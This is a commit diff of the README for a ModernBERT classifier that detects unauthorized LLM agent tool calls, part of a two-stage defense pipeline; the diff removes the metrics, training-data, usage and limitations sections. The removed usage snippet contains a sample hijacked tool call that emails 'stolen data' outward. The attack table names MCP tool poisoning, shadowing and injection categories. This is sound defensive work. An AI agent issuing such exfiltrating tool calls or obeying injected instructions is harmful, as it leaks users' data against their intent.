Xunzhuo committed on
Commit 48c3fec · verified · 1 Parent(s): f9c8f39

Update README.md

Files changed (1)
  1. README.md +2 -120
README.md CHANGED
@@ -20,7 +20,7 @@ datasets:
  base_model: answerdotai/ModernBERT-base
  pipeline_tag: token-classification
  model-index:
- - name: tool-call-verifier
    results:
    - task:
        type: token-classification
@@ -46,7 +46,6 @@ model-index:

  [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
  [![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
- [![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)

  **Stage 2 of Two-Stage LLM Agent Defense Pipeline**

@@ -65,54 +64,6 @@ ToolCallVerifier is a **ModernBERT-based token classifier** that detects unautho

  ---

- ## 📊 Performance
-
- | Metric | Value |
- |--------|-------|
- | **UNAUTHORIZED F1** | **93.50%** |
- | UNAUTHORIZED Precision | 95.01% |
- | UNAUTHORIZED Recall | 92.05% |
- | Overall Accuracy | 92.88% |
-
- ### Confusion Matrix (Token-Level)
-
- ```
-                  Predicted
-                AUTH     UNAUTH
- Actual AUTH   130,708    8,483
-        UNAUTH  13,924  161,031
- ```
-
- ---
-
- ## 🗂️ Training Data
-
- Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:
-
- ### HuggingFace Datasets
-
- | Dataset | Description | Samples |
- |---------|-------------|---------|
- | [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
- | [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
- | [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
- | [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
-
- ### Synthetic Attack Generators
-
- | Generator | Description |
- |-----------|-------------|
- | Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
- | Filesystem | File/directory operation attacks |
- | Network | Network/API exfiltration attacks |
- | Email | Email tool hijacking |
- | Financial | Transaction manipulation |
- | Code Execution | Code injection attacks |
- | Authentication | Access control bypass |
- | MCP Attacks | Tool poisoning, shadowing, rug pulls |
-
- ---
-
  ## 🚨 Attack Categories Covered

  | Category | Source | Description |
@@ -127,60 +78,6 @@ Trained on **~30,000 samples** combining real-world attacks and synthetic patter
  | MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
  | MCP Shadowing | Synthetic | Fake authorization context |

- ---
-
- ## 💻 Usage
-
- ```python
- from transformers import AutoTokenizer, AutoModelForTokenClassification
- import torch
-
- model_name = "rootfs/tool-call-verifier"
- tokenizer = AutoTokenizer.from_pretrained(model_name)
- model = AutoModelForTokenClassification.from_pretrained(model_name)
-
- # Example: Verify a tool call
- user_intent = "Summarize my emails"
- tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'
-
- # Combine for classification
- input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
- inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)
-
- with torch.no_grad():
-     outputs = model(**inputs)
-     predictions = torch.argmax(outputs.logits, dim=-1)
-
- id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
- tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
- labels = [id2label[p.item()] for p in predictions[0]]
-
- # Check for unauthorized tokens
- unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
- if unauthorized_tokens:
-     print("⚠️ BLOCKED: Unauthorized tool call detected!")
-     print(f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
- else:
-     print("✅ Tool call authorized")
- ```
-
- ---
-
- ## ⚙️ Training Configuration
-
- | Parameter | Value |
- |-----------|-------|
- | Base Model | `answerdotai/ModernBERT-base` |
- | Max Length | 512 tokens |
- | Batch Size | 32 |
- | Epochs | 5 |
- | Learning Rate | 3e-5 |
- | Loss | CrossEntropyLoss (class-weighted) |
- | Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
- | Attention | SDPA (Flash Attention) |
- | Hardware | AMD Instinct MI300X (ROCm) |
-
- ---

  ## 🔗 Integration with FunctionCallSentinel

@@ -188,7 +85,7 @@ This model is **Stage 2** of a two-stage defense pipeline:

  ```
  ┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
- │   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
  │                 │     │      (Stage 1)       │     │                 │
  └─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                                │
@@ -220,23 +117,8 @@ This model is **Stage 2** of a two-stage defense pipeline:
  - Non-tool-calling scenarios
  - Languages other than English

- ---
-
- ## ⚠️ Limitations
-
- 1. **Tool schema dependent** - Best performance when tool schema is included in input
- 2. **English only** - Not tested on other languages
- 3. **Binary classification** - No "suspicious" intermediate category (by design, for decisiveness)
-
- ---

  ## 📜 License

  Apache 2.0

- ---
-
- ## 🔗 Links
-
- - **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)
-
 
  base_model: answerdotai/ModernBERT-base
  pipeline_tag: token-classification
  model-index:
+ - name: toolcall-verifier
    results:
    - task:
        type: token-classification
 

  [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
  [![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)

  **Stage 2 of Two-Stage LLM Agent Defense Pipeline**

 

  ---

  ## 🚨 Attack Categories Covered

  | Category | Source | Description |
 
  | MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
  | MCP Shadowing | Synthetic | Fake authorization context |


  ## 🔗 Integration with FunctionCallSentinel

 

  ```
  ┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
+ │   User Prompt   │────▶│   ToolCallSentinel   │────▶│   LLM + Tools   │
  │                 │     │      (Stage 1)       │     │                 │
  └─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                                │
 
  - Non-tool-calling scenarios
  - Languages other than English


  ## 📜 License

  Apache 2.0
